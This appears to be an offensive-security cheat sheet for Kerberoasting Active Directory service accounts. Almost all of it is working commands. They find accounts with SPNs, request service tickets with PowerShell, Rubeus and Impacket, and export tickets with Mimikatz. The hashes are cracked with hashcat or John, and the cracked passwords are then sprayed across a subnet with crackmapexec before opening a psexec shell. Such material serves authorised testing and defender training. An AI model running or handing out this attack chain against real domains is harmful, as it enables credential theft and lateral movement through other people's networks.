Skip to main content

Overview

Kerberoasting requests TGS tickets for service accounts (accounts with SPNs), then cracks them offline. Any domain user can request TGS tickets — no special privileges needed.

Find Service Accounts (SPNs)

PowerShell (No Tools)

setspn -Q */*
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Select Name, ServicePrincipalName

PowerView

Get-DomainUser -SPN | Select samaccountname, serviceprincipalname

Request TGS Tickets

PowerShell (No Tools)

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/db01.target.local:1433"

Rubeus

Rubeus.exe kerberoast /outfile:hashes.txt
Target specific user:
Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.txt
RC4 only (easier to crack):
Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt

Impacket (Remote from Linux)

impacket-GetUserSPNs target.local/user:password -dc-ip DC_IP -request -outputfile hashes.txt

Extract from Memory

Mimikatz

kerberos::list /export
Exports .kirbi files. Convert to hashcat format:
kirbi2john.py ticket.kirbi > hash.txt

Crack TGS Hashes

Hashcat

# Type 23 — RC4 (krb5tgs$23$)
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

# Type 17 — AES128
hashcat -m 19600 hashes.txt /usr/share/wordlists/rockyou.txt

# Type 18 — AES256
hashcat -m 19700 hashes.txt /usr/share/wordlists/rockyou.txt

John

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Post-Exploitation

Cracked service account password → check privileges:
# Test credentials
crackmapexec smb TARGET -u svc_account -p 'CrackedPassword'

# Check if local admin anywhere
crackmapexec smb SUBNET/24 -u svc_account -p 'CrackedPassword'

# PSExec if admin
impacket-psexec target.local/svc_account:'CrackedPassword'@TARGET

Quick Reference

ToolWhereNotes
setspnTarget (Windows)Built-in, no download
RubeusTarget (Windows)Most features, .NET
GetUserSPNsAttacker (Linux)Remote, needs creds
MimikatzTarget (Windows)Export from memory